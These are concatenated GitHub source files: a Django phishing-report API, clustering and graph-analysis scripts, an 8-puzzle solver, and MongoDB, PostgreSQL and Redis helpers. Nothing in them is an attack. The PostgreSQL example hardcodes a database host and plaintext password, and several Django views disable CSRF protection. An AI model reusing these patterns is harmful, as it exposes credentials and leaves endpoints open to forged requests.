is_done(self):\n return self._skip\n\n","repo_name":"gkahn13/GtS","sub_path":"src/gcg/samplers/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"33"} +{"seq_id":"36934822332","text":"from rest_framework import generics\nfrom rest_framework.response import Response\nfrom rest_framework.status import (\n HTTP_200_OK,\n HTTP_400_BAD_REQUEST\n)\nfrom . import serializers\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .services import phishing_system\nimport re\nfrom .models import Message, Domain, Country\nimport pytz\nfrom urllib.parse import urlparse\nfrom django.db.models import Count\nfrom datetime import datetime\nfrom datetime import timedelta\n\nclass check_url_blacklist(generics.CreateAPIView):\n serializer_class = serializers.CheckUrlSerializer\n\n @csrf_exempt\n def post(self, request):\n body = request.data\n if 'message' in body:\n message = body['message']\n phishing = phishing_system.check_message(message)\n if phishing is None:\n return Response( \n status=HTTP_400_BAD_REQUEST\n )\n else:\n return Response(\n data=phishing,\n status=HTTP_200_OK\n )\n else:\n return Response(\n status=HTTP_400_BAD_REQUEST\n )\n\nclass obtain_phishing_message(generics.CreateAPIView):\n serializer_class = serializers.ReportMessageSerializer\n\n @csrf_exempt\n def post(self, request):\n body = request.data\n if 'message' in body and 'isoCode' in body and 'isPhishing' in body:\n message = body['message']\n url = re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', message)\n if len(url) == 0:\n return Response(\n status=HTTP_400_BAD_REQUEST\n )\n iso_code = body['isoCode'].lower()\n try:\n country_name = pytz.country_names[iso_code]\n except KeyError:\n return Response(\n status=HTTP_400_BAD_REQUEST\n )\n country = Country.objects.get_or_create(name=country_name, country_iso_code=iso_code)\n\n domain_name = urlparse(url[0]).netloc\n domain = Domain.objects.get_or_create(name=domain_name)\n\n if body['isPhishing']:\n domain[0].frequency += 1\n domain[0].save()\n\n Message.objects.create(\n url=url[0],\n considered_phishing=body['isPhishing'],\n country=country[0],\n domain=domain[0]\n )\n\n return Response(\n data={\"result\": True},\n status=HTTP_200_OK\n )\n\n else:\n return Response(\n status=HTTP_400_BAD_REQUEST\n )\n\nclass domain_list(generics.ListAPIView):\n serializer_class = serializers.DomainSerializer\n\n def get_queryset(self):\n return Domain.objects.all().filter(frequency__gt=0).order_by('-frequency')\n\n\nclass pie_chart(generics.ListAPIView):\n serializer_class = serializers.PieChartSerializer\n\n def get(self, request):\n phishing_messages = Message.objects.filter(considered_phishing=True).count()\n non_phishing_messages = Message.objects.filter(considered_phishing=False).count()\n return Response(\n data={\"phishing\": phishing_messages, \"non_phishing\": non_phishing_messages},\n status=HTTP_200_OK\n )\n\nclass bar_chart(generics.CreateAPIView):\n serializer_class = serializers.BarChartSerializer\n\n @csrf_exempt\n def post(self, request):\n if 'filter' in request.data:\n if request.data['filter'] == \"Este mes\":\n chart = Message.objects.filter(registered_date__gt=datetime.now() - timedelta(days=30)).filter(considered_phishing=True).values('country__name').annotate(total=Count('country__name')).order_by('-total')[:3]\n elif request.data['filter'] == \"Hoy\":\n chart = 
Message.objects.filter(registered_date__gt=datetime.now() - timedelta(days=1)).filter(considered_phishing=True).values('country__name').annotate(total=Count('country__name')).order_by('-total')[:3]\n elif request.data['filter'] == \"Esta semana\":\n chart = Message.objects.filter(registered_date__gt=datetime.now() - timedelta(days=7)).filter(considered_phishing=True).values('country__name').annotate(total=Count('country__name')).order_by('-total')[:3]\n else:\n return Response(\n status=HTTP_400_BAD_REQUEST)\n return Response(\n data={\"chart\": chart},\n status=HTTP_200_OK\n )\n else:\n return Response(\n status=HTTP_400_BAD_REQUEST)\n","repo_name":"Phiseado/phisheado-backend","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"69870151134","text":"#!/usr/env python3\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nfrom sklearn.cluster import KMeans, MeanShift, estimate_bandwidth\nfrom sklearn.metrics import silhouette_score\nimport os\nfrom sklearn.preprocessing import OneHotEncoder\nfrom tqdm import tqdm\nimport logging\nimport sys\n\n# Configurer le module logging pour afficher les informations à la sortie standard\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\ndef read_data(file_path):\n \"\"\" Cette fonction lit le fichier csv et retourne un dataframe Pandas.\"\"\"\n print('Loading data...')\n data = pd.read_csv(file_path)\n print('Data loaded successfully.')\n \n # Convertir Downloads en nombre entier\n data['Downloads'] = data['Downloads'].str.extract('(\\d+)').astype(int)\n \n # One-hot encoding pour les colonnes catégorielles\n print('Encoding categorical features...')\n encoder = OneHotEncoder(sparse_output=False)\n encoded_features = encoder.fit_transform(data[['Author', 'Subject', 'LoC Class']])\n encoded_df = pd.DataFrame(encoded_features, columns=encoder.get_feature_names_out(['Author', 'Subject', 'LoC Class']))\n \n # Concaténer le dataframe encodé avec le dataframe original\n data = pd.concat([data, encoded_df], axis=1)\n print('Categorical features encoded successfully.')\n \n # Supprimer les colonnes non pertinentes\n data.drop(['Title', 'URL', 'Author', 'Subject', 'LoC Class'], axis=1, inplace=True)\n return data\n\ndef kmeans_clustering(data):\n \"\"\" Cette fonction effectue le clustering KMeans sur le dataframe donné en entrée et renvoie le modèle entraîné.\"\"\"\n print('Performing KMeans clustering...')\n kmeans = KMeans(n_clusters=3, n_init=10).fit(data)\n score = silhouette_score(data, kmeans.labels_)\n print(f'Silhouette score for KMeans: {score}')\n return kmeans\n\ndef mean_shift_clustering(data):\n print('Performing MeanShift clustering...')\n bandwidth = estimate_bandwidth(data, quantile=0.2, n_samples=100)\n model = MeanShift(bandwidth=bandwidth, bin_seeding=True).fit(data)\n score = silhouette_score(data, model.labels_)\n print(f'Silhouette score for MeanShift: {score}')\n return model\n\ndef plot_clusters(data, kmeans_model, mean_shift_model):\n print('Plotting clusters...')\n fig, axs = plt.subplots(nrows=1, ncols=2, figsize=(15, 5))\n\n axs[0].set_title('kmeans')\n axs[0].scatter(data.iloc[:, 0], data.iloc[:, 1], c=kmeans_model.labels_, cmap='viridis')\n\n axs[1].set_title('MeanShift')\n axs[1].scatter(data.iloc[:, 0], data.iloc[:, 1], c=mean_shift_model.labels_, cmap='viridis')\n\n plt.tight_layout()\n \n if not 
os.path.exists('graphs'):\n os.makedirs('graphs')\n \n plt.savefig('graphs/clusters.png')\n print('Clusters plotted and saved successfully.')\n plt.close()\n\ndef perform_data_clustering():\n print('Starting data clustering...')\n data = read_data('/home/anis/Bureau/git-work /Gutenberg-Project/books_info.csv')\n kmeans_model = kmeans_clustering(data)\n mean_shift_model = mean_shift_clustering(data)\n plot_clusters(data, kmeans_model, mean_shift_model)\n print('Data clustering completed successfully.')\n\ndef main():\n perform_data_clustering()\n\nif __name__ == '__main__':\n main()\n","repo_name":"Anis-cpu-13/Gutenberg-Project","sub_path":"data_clustering.py","file_name":"data_clustering.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"6657621582","text":"import heapq\r\nimport random\r\n\r\nheap = []\r\nheapq.heapify(heap)\r\n\r\narr = [ [7,2,4],\r\n [5,0,6],\r\n [8,3,1] ]\r\n\r\nFinal_ans = [\r\n [1,2,3],\r\n [4,5,6],\r\n [7,8,0]\r\n]\r\n\r\ndef print_heap():\r\n for i in range(len(heap)):\r\n val = heap[i]\r\n #[val1,i-1,j,2,lvl+1,min_dit]\r\n print(\"LEVEL : \",val[4])\r\n print(\"manhattan : \",val[0])\r\n print(\"i j : \",val[1],val[2])\r\n print(\"cannot move to : \",val[3])\r\n print_arr(val[5])\r\n\r\ndef print_arr(dit):\r\n arr = [[0 for i in range(3)] for j in range(3)]\r\n print()\r\n for i in range(9):\r\n arr[dit[i][0]][dit[i][1]] = i\r\n \r\n for row in arr:\r\n print(row)\r\n \r\n print()\r\n \r\ndef printA():\r\n print()\r\n for row in arr:\r\n print(row)\r\n print()\r\n\r\ndef manhattan(dit2):\r\n ans = 0\r\n dit1 = {1:[0,0],2:[0,1],3:[0,2],4:[1,0],5:[1,1],6:[1,2],7:[2,0],8:[2,1],0:[2,2]}\r\n print(dit2)\r\n for i in range(9):\r\n val1 = abs(dit1[i][0]-dit2[i][0])\r\n val2 = abs(dit1[i][1]-dit2[i][1])\r\n ans+=val1+val2\r\n return ans\r\n\r\ndef build_arr(dit):\r\n arr = [[0 for i in range(3)] for j in range(3)]\r\n for i in range(9):\r\n arr[dit[i][0]][dit[i][1]] = i\r\n return arr\r\n\r\ndef all_move(i,j,prev_move,lvl,dit):\r\n if(i-1>=0 and prev_move!=1):\r\n dit[arr[i][j]],dit[arr[i-1][j]] = dit[arr[i-1][j]],dit[arr[i][j]]\r\n Arr = build_arr(dit)\r\n val1 = manhattan(dit) + 1 +lvl\r\n min_dit = dit.copy()\r\n build_arr(dit)\r\n #h_val,lvl,random_num,i,j,prev_move,dit,arr.copy()\r\n heapq.heappush(heap,[val1,lvl+1,random.randint(0,1000),i-1,j,2,min_dit,Arr])\r\n dit[arr[i][j]],dit[arr[i-1][j]] = dit[arr[i-1][j]],dit[arr[i][j]]\r\n \r\n if(i+1<=2 and prev_move!=2):\r\n dit[arr[i][j]],dit[arr[i+1][j]] = dit[arr[i+1][j]],dit[arr[i][j]]\r\n Arr = build_arr(dit)\r\n val2 = manhattan(dit)+ 1 + lvl\r\n min_dit = dit.copy()\r\n heapq.heappush(heap,[val2,lvl+1,random.randint(0,1000),i+1,j,1,min_dit,Arr])\r\n dit[arr[i][j]],dit[arr[i+1][j]] = dit[arr[i+1][j]],dit[arr[i][j]]\r\n \r\n if(j-1>=0 and prev_move!=3):\r\n dit[arr[i][j]],dit[arr[i][j-1]] = dit[arr[i][j-1]],dit[arr[i][j]]\r\n Arr = build_arr(dit)\r\n val3 = manhattan(dit)+ 1 + lvl\r\n min_dit = dit.copy()\r\n heapq.heappush(heap,[val3,lvl+1,random.randint(0,1000),i,j-1,4,min_dit,Arr])\r\n dit[arr[i][j]],dit[arr[i][j-1]] = dit[arr[i][j-1]],dit[arr[i][j]]\r\n \r\n if(j+1<=2 and prev_move!=4):\r\n dit[arr[i][j]],dit[arr[i][j+1]] = dit[arr[i][j+1]],dit[arr[i][j]]\r\n Arr = build_arr(dit)\r\n val4 = manhattan(dit)+ 1 + lvl\r\n min_dit = dit.copy()\r\n heapq.heappush(heap,[val4,lvl+1,random.randint(0,1000),i,j+1,3,min_dit,Arr])\r\n dit[arr[i][j]],dit[arr[i][j+1]] = dit[arr[i][j+1]],dit[arr[i][j]]\r\n\r\ndit = 
{}\r\n\r\nfor i in range(len(arr)):\r\n for j in range(len(arr[0])):\r\n dit[arr[i][j]] = [i,j]\r\n \r\ni = 1\r\nj = 1\r\n\r\nprev_move = -1\r\nprint(dit)\r\nh_val = manhattan(dit)\r\nlvl = 1\r\nrandom_num = random.randint(0,1000)\r\n\r\nheapq.heappush(heap,[h_val,lvl,random_num,i,j,prev_move,dit,arr.copy()])\r\nmoves = 1000\r\n\r\nwhile heap and moves>0:\r\n moves-=1\r\n\r\n ele = heapq.heappop(heap)\r\n i = ele[3]\r\n j = ele[4]\r\n arr = ele[-1]\r\n print(\"I J : \",i,j)\r\n printA()\r\n print(\"MAN : \",ele[0])\r\n print()\r\n prev_move = ele[5]\r\n lvl = ele[1]\r\n dit = ele[6]\r\n\r\n if(arr==Final_ans):\r\n print(\"FOUND SOLN!!!\")\r\n break\r\n\r\n all_move(i,j,prev_move,lvl,dit.copy())\r\n","repo_name":"suganth14/AI","sub_path":"8puzzlea.py","file_name":"8puzzlea.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"73489794973","text":"import os\nimport csv\nimport networkx as nx\nimport random\nimport numpy as np\n\n# star threshold 1\n# The threshold is represented by the mean of degrees\ndef starThreshold_1(G):\n degree_total = 0\n for x in G.nodes():\n degree_total = degree_total + G.degree(x)\n threshold = degree_total / len(G)\n return(threshold)\n\n\n# star threshold\n# The threshold is represented by the percentile of degrees\ndef starThreshold_2(G, s=2):\n G_degree = nx.degree(G)\n lst = []\n for i in G_degree:\n lst.append(i[1])\n threshold = np.percentile(lst, [25, 50, 75])\n return(threshold[s])\n\n\ndef Extract_Global_High_Neighbor(G, heigh_neighbour, anomaly_total):\n '''\n :param G: original graph\n :param heigh_neighbour: the first x heigh degree nodes\n :return: G with label 1 (Global_High_Neighbor)\n '''\n nodes_num = round(heigh_neighbour * len(G))\n node_degree = [[n, d] for n, d in G.degree()]\n\n sort_node_degree = sorted(node_degree, key=lambda tup: tup[1], reverse=True)[:nodes_num]\n # sorted\n hubs = []\n\n for i in sort_node_degree:\n hubs.append(i[0])\n\n anomaly_total['global'] = []\n for node in hubs:\n G.node[node]['global'] = 1\n anomaly_total['global'].append(node)\n\n\n\n# Extract the star structure in the graph\ndef Extract_Star(G, threshold, anomaly_total):\n '''\n :param G: original graph\n :return: G with label 1 (Star)\n '''\n\n # find star\n star_num = {}\n star_threshold = threshold\n flag = 0\n node_sort = sorted(list(G.nodes()))\n for node in node_sort:\n # find nodes's neighbor\n node_neighbor = list(G.neighbors(node))\n if len(node_neighbor) > star_threshold:\n for node1 in node_neighbor:\n flag = 1\n node1_neighbor = list(G.neighbors(node1))\n\n list1 = list(set(node_neighbor) & set(node1_neighbor))\n\n if len(list1) != 0:\n flag = 0\n break\n if flag == 1:\n star_num[node] = len(node_neighbor)\n else:\n continue\n\n star_num = sorted(star_num.items(), key=lambda x: x[1], reverse=True)\n star = []\n\n for u, v in star_num:\n star.append(u)\n\n anomaly_total['star'] = []\n if star:\n for node in star:\n G.node[node]['star'] = 1\n anomaly_total['star'].append(node)\n\n\n# load graph to networkx\ndef loadData(path1, path2, isDirect):\n\n # add nodes\n f = open(path1, \"r\")\n reader1 = csv.reader(f)\n nodes = []\n # for item in reader1:\n # if int(item[1]) == 2:\n # nodes.append(int(item[0]))\n for item in reader1:\n nodes.append(int(item[0]))\n f.close()\n if isDirect:\n G = nx.DiGraph()\n else:\n G = nx.Graph()\n G.add_nodes_from(nodes)\n\n # add edges\n f = open(path2, \"r\")\n reader1 = csv.reader(f)\n edges = []\n # for item in 
reader1:\n # if int(item[2]) == 2:\n # edges.append([int(item[0]), int(item[1])])\n for item in reader1:\n edges.append([int(item[0]), int(item[1])])\n f.close()\n G.add_edges_from(edges)\n return (G)\n\n\n# data processing\ndef dataTest():\n # path1 = \"starmatrix/toycase10_node.csv\"\n # path2 = \"starmatrix/toycase10_edge.csv\"\n\n path1 = \"../GraphSampling/formalData/as_node.csv\"\n path2 = \"../GraphSampling/formalData/as_edge.csv\"\n\n\n file = os.path.splitext(path1)\n filename, type = file\n a = filename.split('/')\n b = a[-1].split('_')\n fn = b[0]\n\n isDirect = False\n G = loadData(path1, path2, isDirect)\n\n # origin graph\n threshold = starThreshold_2(G)\n heigh_neighbour = 0.05\n anomaly_total1 = {}\n Extract_Global_High_Neighbor(G, heigh_neighbour, anomaly_total1)\n Extract_Star(G, threshold, anomaly_total1)\n\n print('node:', len(G))\n print('edge:', nx.number_of_edges(G))\n print(anomaly_total1)\n print(len(anomaly_total1['global']))\n print(len(anomaly_total1['star']))\n\n\n\nif __name__ == '__main__':\n dataTest()","repo_name":"HawkinYap/GraphAnalysis","sub_path":"OtherAlgorithm/extract_outlier_in_graph.py","file_name":"extract_outlier_in_graph.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"71798566496","text":"from pymongo import MongoClient\nimport logging\nimport traceback\nimport gridfs\nfrom fastapi import HTTPException\nimport os\n\nLOG_FILENAME = 'app_logs.log'\n\nlogging.basicConfig(filename=LOG_FILENAME, level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\n\ndef mongodb_connection():\n try:\n mongodb_uri = os.environ['MONGO_CONNECTION_STRING'] \n # mongodb_uri = 'mongodb://localhost:27017/'\n mongodb = MongoClient(mongodb_uri)\n mongodb.server_info()\n return mongodb\n except KeyError:\n logging.error(\"error occured connecting to database\")\n raise HTTPException(status_code=500, detail=\"error occured connecting to database\")\n except Exception as e:\n logging.error(\"Unable to connect to MongoDB\")\n logging.error(traceback.format_exc())\n raise e\n\ndef get_users_collections_and_fs():\n mongodb = mongodb_connection()\n try:\n db_name = os.environ['DB_NAME'] \n collection_name = os.environ['COLLECTION_NAME']\n # db_name = 'oneable_user_monitoring_database'\n # collection_name = 'users'\n db = mongodb[db_name]\n \n if db_name not in mongodb.list_database_names():\n raise ValueError('Database not found')\n \n users_collection = db[collection_name]\n print(users_collection)\n fs = gridfs.GridFS(db)\n return users_collection, fs\n except KeyError as ke:\n logging.error(f\"Environment variable {ke} is not set\")\n raise HTTPException(status_code=500, detail=f\"{ke} not set\")\n except ValueError as ve:\n logging.error(ve)\n logging.error(traceback.format_exc())\n raise HTTPException(status_code=500, detail=\"Database not found.\")\n except Exception as e:\n logging.error(f\"An error occurred: {str(e)}\")\n logging.error(traceback.format_exc())\n raise HTTPException(status_code=500, detail=\"An unexpected error occurred.\")\n","repo_name":"Ravindrareddygontu/myprojectfiles","sub_path":"FaceRecognitionPythonServerSideCode/mongo_client.py","file_name":"mongo_client.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"34186753402","text":"from datetime import datetime\n\nfrom django.http import 
JsonResponse\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import generics\nfrom rest_framework.decorators import api_view, authentication_classes\nfrom rest_framework.response import Response\nfrom django.shortcuts import get_object_or_404\nfrom .serializers import PlantSerializer, DataTableSerializer\nfrom Core.models import Plant, DataTable\nfrom Core.models import Plant\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authentication import SessionAuthentication\n\n\n\n# Create your views here.\nclass PlantListCreateView(generics.ListCreateAPIView):\n queryset = Plant.objects.all()\n serializer_class = PlantSerializer\n # authentication_classes = [TokenAuthentication]\n # permission_classes = [IsAuthenticated]\n\n\nclass DataTableListCreateView(generics.ListCreateAPIView):\n queryset = DataTable.objects.all()\n serializer_class = DataTableSerializer\n # authentication_classes = [TokenAuthentication]\n # permission_classes = [IsAuthenticated]\n\n\n# @csrf_exempt\n@api_view(['GET'])\ndef get_plant(request, plant_id):\n try:\n plant = Plant.objects.get(pk=plant_id)\n except Plant.DoesNotExist:\n return Response({'Error': 'Plant Not Found!!!'}, status=404)\n\n serializer = PlantSerializer(plant)\n return Response(serializer.data)\\\n\n@api_view(['GET'])\ndef get_all_plants(request):\n try:\n plants = Plant.objects.filter(user=request.user)\n serializer = PlantSerializer(plants, many=True)\n return JsonResponse(serializer.data, safe=False)\n except Plant.DoesNotExist:\n return Response({'Error': 'Plant Not Found!!!'}, status=404)\n\n\n@csrf_exempt\n@api_view(['POST', 'PUT'])\ndef update_plant(request, plant_id):\n if request.method == 'GET':\n return Response({'message': 'GET request received'}, status=200)\n\n try:\n plant_entry = Plant.objects.get(pk=plant_id)\n except Plant.DoesNotExist:\n return Response({'Error': 'plant not found!'}, status=404)\n\n if request.method == 'POST' or request.method == 'PUT':\n data = request.data\n data['user'] = request.user.id\n print(data)\n serializer = PlantSerializer(plant_entry, data=data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=400)\\\n\n\n\n@csrf_exempt\n@api_view(['POST', 'PUT'])\ndef update_data_table_entry(request, entry_id):\n if request.method == 'GET':\n return Response({'message': 'GET request received'}, status=200)\n\n try:\n print('UPDATE DATATABLE')\n data_entry = get_object_or_404(DataTable, uuid=entry_id)\n plant_id = request.data['plant_id']\n plant_obj = get_object_or_404(Plant, id=plant_id)\n data = request.data\n data['plant'] = plant_obj.id\n data.pop('plant_id')\n print(data_entry, 'beannnnnns')\n print(data_entry.__dict__)\n print(data, 'THE DATA')\n if data['m_temp'] != 'None':\n data['m_temp'] = float(data.get('m_temp', None))\n else:\n data['m_temp'] = None\n if data['m_moist'] != 'None':\n data['m_moist'] = float(data.get('m_moist', None))\n else:\n data['m_moist'] = None\n if data['m_ec'] != 'None':\n data['m_ec'] = float(data.get('m_m_ec', None))\n else:\n data['m_ec'] = None\n if data['m_nitrogen'] != 'None':\n data['m_nitrogen'] = float(data.get('m_nitrogen', None))\n else:\n data['m_nitrogen'] = None\n if data['m_phosphorus'] != 'None':\n data['m_phosphorus'] = float(data.get('m_phosphorus', None))\n else:\n data['m_phosphorus'] = None\n if data['m_potassium'] 
!= 'None':\n data['m_potassium'] = float(data.get('m_potassium', None))\n else:\n data['m_potassium'] = None\n if data['m_ph'] != 'None':\n data['m_ph'] = float(data.get('m_ph', None))\n else:\n data['m_ph'] = None\n data['date_time'] = datetime.strptime(data['date_time'], '%Y-%m-%d %H:%M:%S')\n print(data, 'daaaaaata')\n\n # {'plant_id': 2, 'uuid': 'cc09a0a8-c161-4115-8640-fe8e68e5e73a', 'm_temp': 1.0, 'm_moist': 2.0, 'm_ec': 1.0, 'm_npk': 2.0, 'm_ph': 1.0, 'date_time': datetime.datetime(2023, 10, 3, 4, 2, 15, 197382, tzinfo=datetime.timezone.utc)}\n # {'plant_id': 2, 'uuid': 'cc09a0a8-c161-4115-8640-fe8e68e5e73a', 'm_temp': '999.000000', 'm_moist': '888.000000', 'm_ec': '333.000000', 'm_npk': '123.000000', 'm_ph': '11.000000', 'date_time': '2023-09-30 20:49:03'}\n\n\n if request.method == 'POST' or request.method == 'PUT':\n serializer = DataTableSerializer(data_entry, data=data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n print(serializer.errors, 'ERRRROR')\n return Response(serializer.errors, status=400)\n except Exception as error:\n print(error, 'THIS IS AN ERROR')\n return Response({'Error': 'Data entry not found In Update Plant!!!'}, status=404)\n\n\n@csrf_exempt\n@api_view(['GET'])\ndef read_data_table_entry(request, entry_id):\n if request.method == 'GET':\n return Response({'message': 'GET request received'}, status=200)\n\n try:\n data_entry = DataTable.objects.get(pk=entry_id)\n return data_entry\n except DataTable.DoesNotExist:\n return Response({'Error': 'Data entry not found!'}, status=404)\n\n@csrf_exempt\n@api_view(['POST'])\ndef create_data_table_entry(request):\n print(request.data, 'HELLOB')\n if request.method == 'POST':\n plant_id = request.data['plant_id']\n plant_obj = get_object_or_404(Plant, id = plant_id)\n data = request.data\n print(request.data, 'ADDING', plant_obj.id)\n data['plant'] = plant_obj.id\n data.pop('plant_id')\n print(request.data, 'ADDING', plant_obj.id)\n print(type(data['m_temp']), 'MTEMPGG')\n if data['m_temp'] != 'None':\n data['m_temp'] = float(data.get('m_temp',None))\n else:\n data['m_temp'] = None\n if data['m_moist'] != 'None':\n data['m_moist'] = float(data.get('m_moist',None))\n else:\n data['m_moist'] = None\n if data['m_ec'] != 'None':\n data['m_ec'] = float(data.get('m_m_ec',None))\n else:\n data['m_ec'] = None\n if data['m_nitrogen'] != 'None':\n data['m_nitrogen'] = float(data.get('m_nitrogen',None))\n else:\n data['m_nitrogen'] = None\n if data['m_phosphorus'] != 'None':\n data['m_phosphorus'] = float(data.get('m_phosphorus',None))\n else:\n data['m_phosphorus'] = None\n if data['m_potassium'] != 'None':\n data['m_potassium'] = float(data.get('m_potassium',None))\n else:\n data['m_potassium'] = None\n if data['m_ph'] != 'None':\n data['m_ph'] = float(data.get('m_ph',None))\n else:\n data['m_ph'] = None\n data['date_time'] = datetime.strptime(data['date_time'], '%Y-%m-%d %H:%M:%S')\n\n serializer = DataTableSerializer(data=data)\n if serializer.is_valid():\n print(serializer)\n serializer.save()\n return Response(serializer.data, status=201) #201 means created succefully\n else:\n print(serializer.errors)\n return Response(serializer.errors, status=400) # 400 means some error but found\n\n\n@csrf_exempt\n@api_view(['DELETE'])\ndef del_data_table_entry(request, entry_id):\n try:\n data_entry = DataTable.objects.get(pk=entry_id)\n print(data_entry)\n except DataTable.DoesNotExist:\n return Response({'Error': 'Data entry not found!'}, status=404)\n\n if request.method == 
'DELETE':\n data_entry.delete()\n return Response({'message': 'Data Entry Deleted'}, status=204)\n\n\n","repo_name":"DhananjeyanN/PlantFertalizingProject","sub_path":"PlantApi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"27572925626","text":"# pip install psycopg2\n# pip install openpyxl\nimport psycopg2\nimport pandas as pd\n\n# Создание подключения к PostgreSQL\nconn = psycopg2.connect(database = \"home\",\n host = \"212.8.247.94\",\n user = \"student\",\n password = \"qwerty\",\n port = \"5432\")\n\n# Отключение автокоммита\nconn.autocommit = False\n\n# Создание курсора\ncursor = conn.cursor()\n####################################################\n# Выполнение SQL кода в базе данных без возврата результата\ncursor.execute( \"INSERT INTO p3.testtable( id, val ) VALUES ( 3, 'GLEB' )\" )\nconn.commit()\n\n# Выполнение SQL кода в базе данных с возвратом результата\ncursor.execute( \"SELECT * FROM p3.testtable\" )\nrecords = cursor.fetchall()\nfor row in records:\n print( row )\n\n####################################################\n\n# Формирование DataFrame\nnames = [ x[0] for x in cursor.description ]\ndf = pd.DataFrame( records, columns = names )\n\n# Запись в файл\ndf.to_excel( 'pandas_out.xlsx', sheet_name='sheet1', header=True, index=False )\n\n####################################################\n# Чтение из файла\ndf = pd.read_excel( 'pandas_in.xlsx', sheet_name='sheet1', header=0, index_col=None )\n\n# Запись DataFrame в таблицу базы данных\ncursor.executemany( \"INSERT INTO p3.testtable( id, val ) VALUES( %s, %s )\", df.values.tolist() )\nconn.commit()\n# Закрываем соединение\ncursor.close()\nconn.close()\n\n","repo_name":"Kolonin-Gleb/Big-data","sub_path":"Term 5/Lesson11_python_postgress_interaction/python_postgress_interaction.py","file_name":"python_postgress_interaction.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"33384374731","text":"# Create by: Will McGrath\nimport os\nimport sys\n\nimport _pickle as cPickle\nimport numpy as np\nimport pandas as pd\nfrom fastai.text.all import AWD_LSTM, TextDataLoaders, language_model_learner\n\n\n# note: deep learning (LSTM is a RNN) using fastai\nclass TrumpifyTweet(object):\n def __init__(self):\n self.this_dir = os.path.dirname(os.path.realpath(__file__))\n data_dir = os.path.join(self.this_dir, \"../data/twitter_data_with_feats.csv\")\n self.tweets_df = pd.read_csv(data_dir, sep=\",\")\n\n def main(self, input_tweet, num_add_words):\n # set seed\n np.random.seed(1)\n\n # getting DataLoader\n dls = TextDataLoaders.from_df(\n self.tweets_df,\n path=\"../data/\",\n text_col=\"processed_content\",\n seed=3,\n valid_pct=0.3,\n is_lm=True,\n )\n\n # train model\n model_dir = os.path.join(self.this_dir, \"../models/lstm_model.pickle\")\n try:\n with open(model_dir, \"rb\") as f:\n lstm_model = cPickle.load(f)\n\n except FileNotFoundError:\n with open(model_dir, \"wb\") as f:\n # LSTM model to generate sentences\n lstm_model = language_model_learner(dls, AWD_LSTM)\n lstm_model.fit_one_cycle(5)\n cPickle.dump(lstm_model, f)\n\n # predict sentence\n pred_output = lstm_model.predict(input_tweet, num_add_words)\n\n return pred_output\n\n\nif __name__ == \"__main__\":\n input_tweet = input(\"Please enter a Tweet or text: \")\n num_add_words = int(\n input(\"Please enter the number of Trump words you 
would like to add: \")\n )\n sys.exit(TrumpifyTweet().main(input_tweet, num_add_words))\n","repo_name":"wpmcgrath95/TrumpTweetsSentimentAnalysis","sub_path":"python/Trumpify_Tweet.py","file_name":"Trumpify_Tweet.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"3738207708","text":"import asyncio\nimport aioredis\nimport ujson\nimport lz4.frame\nfrom conf import conf\nfrom thrift.protocol.TCompactProtocol import TCompactProtocol\nfrom thrift.transport.TTransport import TMemoryBuffer\nfrom utils import logger, log, print_excp\nfrom random import random\n\nDI_TTL = 5 * 60 if conf.IS_PROD else 60\nRECO_TTL = 7 * 24 * 3600 if conf.IS_PROD else 60\nRELATED_CARD_TTL = 0\n\n\n# noinspection PyMethodMayBeStatic\nclass RedisClient:\n def __init__(self):\n self.redis_pool = []\n self.current = -1\n self.max = len(conf.REDIS['addresses'])\n self.di_versions = {}\n self.reco_versions = {}\n\n async def prepare_conn(self):\n addresses = conf.REDIS['addresses']\n password = conf.REDIS.get('password')\n self.redis_pool = await asyncio.gather(*[\n aioredis.create_redis_pool(addresses[i], minsize=1, maxsize=1) for i in range(self.max)\n ])\n logger.info('RedisClient init done')\n\n async def close(self):\n for i in self.redis_pool:\n try:\n i.close()\n await i.wait_closed()\n except Exception as e:\n print_excp(e)\n\n async def connect(self, write=False):\n if write:\n return self.redis_pool[0]\n else:\n self.current = (self.current + 1) % self.max\n return self.redis_pool[self.current]\n\n def lucky(self):\n return random() < conf.REDIS['probability']\n\n def get_di_version(self, typ):\n return self.di_versions.get(self.di_cls_name(typ), {}).get('version', 0)\n\n def get_reco_version(self, creator):\n return self.reco_versions.get(creator.__name__, {}).get('version', 0)\n\n def cache_list(self, creator, interfaceName, id_index=None):\n version = self.get_reco_version(creator)\n\n def wrapper(f):\n async def g(*args, **kwargs):\n service = args[0]\n key = f'{interfaceName}:{version}'\n if id_index is not None:\n 